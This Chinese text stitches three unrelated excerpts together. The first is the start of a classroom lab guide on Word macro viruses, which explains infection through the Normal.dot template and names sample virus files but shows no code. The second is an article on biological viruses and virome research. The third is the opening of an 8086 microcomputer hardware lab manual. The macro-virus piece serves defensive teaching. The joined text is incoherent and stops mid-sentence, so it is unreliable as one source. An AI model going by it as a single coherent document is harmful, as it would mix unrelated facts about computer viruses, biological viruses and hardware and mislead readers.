实验宏病毒 1.场景描述 在虚拟机中演示word宏病毒的发生机制，以及如何清除病毒的一系列操作。宏病毒样本：自我复制及感染病毒(copy.txt) 类台湾一号病毒(No1.txt) 备注：实验工具（D盘-->攻防工具包-->宏病毒：Copy.txt、TaiWanNo1.txt） 2.实验目的 （1）演示宏的编写 （2）说明宏的原理及其安全漏洞和缺陷 （3）理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识 3.需求分析 宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。 因为Microsoft Word几乎已经成为目前全世界办公文档的事实工业标准，其影响是全球范围的。Word文件的交换是目前办公室数据交流和传送的最通常的方式之一，而且该病毒能跨越多种平台，并且针对数据文档进行破坏，因此具有极大地危害性。所以，必须要掌握如何预防和清除宏病毒，让损失减少。 4.技术分析 Word的文件建立是通过模板来创建的，模板是为了形成最终文档而提供的特殊文档，模板可以包括以下几个元素： 菜单、宏、格式（如备忘录等）。模板是文本、图形和格式编排的蓝图，对于某一类型的所有文档来说，文本、图像 和格式编排都是类似的。 Word提供了几种常见文档类型的模板，如备忘录、报告和商务信件。您可以直接使用模板来创建新文档，或者加 以修改，也可以创建自己的模板。一般情况下，Word自动将新文档基于缺省的公用模板（Normal.dot）。 可以看出，模板在建立整个文档中所起的作用，作为基类，文档继承模板的属性，包括宏、菜单、格式等。 Word处理文档需要同时进行各种不同的动作，如打开文件、关闭文件、读取数据资料以及储存和打印等等。每一 种动作其实都对应着特定的宏命令，如存文件与FileSave相对应、改名存文

病毒与宏病毒全面解读

病毒与宏病毒全面解读 美格基因姜敬哲 病毒知多少？ 提起病毒，人们想到的通常是SARS、埃博拉、艾滋、流感等这些令人不愉快的词汇。事实上，病毒不仅仅影响人的健康，它们还有更重要的使命：推动自然物种的更替与演化，驱动生物地球化学的循环（Suttle等，2005）。 世上丰度最高的类群 病毒是我们这个星球上丰度最高的生命体。它们存在于世界的任意角落：从体型硕大的蓝鲸、非洲象，到肉眼无法分辨的寄生虫、细菌、衣原体等，但凡是“活”的东西，都有专门负责“办”它的病毒。

图1 常见感染人体的病毒形状和大小 科学研究中的暗物质 据推测，地球上的病毒种类多达8700万种，其中可能感染人类的病毒就有73万种，但目前比较确认的已知病毒却只有约5000种，已知的人类病毒仅有263种（Geoghegan 等，2017；Carroll 等，2018）。由此可见，病毒是生命科学研究中实打实的“暗物质”。 图2 目前地球上已知和未知的病毒物种数量

宏病毒组 病毒和细菌不同，不同病毒基因组的差异非常大，根本没有16S rDNA这种进化保守的基因，所以无法做扩增子（Amplicon）。 2002 年，Forest Rowher课题组基于宏基因组（Metagenome）研究思路，对海水中的病毒进行了富集，高通量测序后发现大量的未知病毒（Breitbart等，2002）。自此，宏病毒组（Virome）概念应运而生（即，组成一个特定生态系统或共生系统中所有病毒的集合）。 2018 年，由包括我国高福院士在内的多位世界级病毒专家在Science杂志上联合刊文，提出“全球病毒组计划”（GVP）（Carroll等，2018），将宏病毒组研究推到了一个全新的高度。 CNS中的常客 近几年，科学家运用宏病毒组学技术对多种环境、动物、微生物、以及人类各种来源的样品进行了不少的研究，产生很多突破性成果，见刊CNS已成为常态。代表作如，美国能源部的联合基因组研究所（JGI）针对全球3042份各种来源的样品进行的病毒组分析，共获得超过125 000个DNA病毒的基因组序列，将已知病毒基因集扩大16倍（Paez-Espino等，2016）。 在病毒组领域，中国科学家在其中也扮演了重要角色。2016和2018年，Nature 杂志两次报道了我国科学家张永振团队的关于无脊椎动物和脊椎动物病毒组的研究成果。他们对388种无脊椎和低等脊椎动物样品进行了大规模的转录组测序，鉴定出1659种RNA病毒，其中绝大多数为首次发现（Shi等，2016和2018，图3）。该研究的意义在于，彻底重新构建了RNA病毒世界的系统发育树，对RNA 病毒的分类进行了全新的界定。

微机原理实验指导书-硬件部分(2017)

微机原理实验指导书 硬件实验部分 东华大学信息科学与技术学院信息与控制实验中心 2017.11

关于微机原理硬件部分实验的说明 硬件部分包含5个基本实验和一个综合设计实验。综合设计实验为选作部分。每个实验需完成各自的实验报告。报告内容以每项实验的思考题内容为主，不需要抄录实验指导书提供的范例程序。基本实验的报告内容具体要求为： 1、实验名称、所需设备、实验目的。 2、思考题要求。 3、有提问的思考题分析解答。 4、需要编程的思考题的程序的流程框图 5、思考题的全部源程序代码，源程序需加上必要的注释。 6、思考题的程序在调试中出现的问题及解决过程。 ●实验必须完成基础实验部分，综合设计实验选作。 ●硬件实验成绩按基本实验情况（85%）和选作实验情况（15%）综 合评定。

一、实验设备及软件介绍 第1部分硬件系统介绍 1. CPU单元及外围芯片 1）、微处理器：8086 2）、时钟频率：6MHz 3）、存储器 6264 系统RAM，地址范围 0～3FFFH，奇地址有效 6264 系统RAM，地址范围0～3FFFH，偶地址有效 27C64 系统ROM，地址范围 FC000～FFFFFH，奇地址有效 27C256 系统ROM，地址范围 FC000～FFFFFH，偶地址有效4）、可提供的对8086的基本实验 （1）．简单I/O扩展实验 （2）．存储器扩展实验 （4）．8255可编程并口实验 （5）．8253定时/计数器实验 （6）．A/D0809实验 （7）．D/A0832实验 （8）．8250可编程串口实验 （9）．8279显示器接口实验 （10）．8279键盘扩展实验 （11）．8259可编程中断控制器实验 5）、系统资源分配 本系统采用可编程逻辑器件（CPLD）EPM7128做地址的编译码工作，可通过芯片的JTAG接口与PC机相连，对芯片进行编程,可完成系统器件，如监控程序 存储器、用户程序存储器、数据存储器、系统显示控制器、系统串行通讯控制器 等的地址译码功能，同时也由部分地址单元经译码后输出（插孔CS0---CS5）给 用户使用，他们的地址固定，用户不可改变。 2．地址资源分配 本系统采用可编程逻辑器件（CPLD）EPM7128作为地址译码器，完成系统器件如存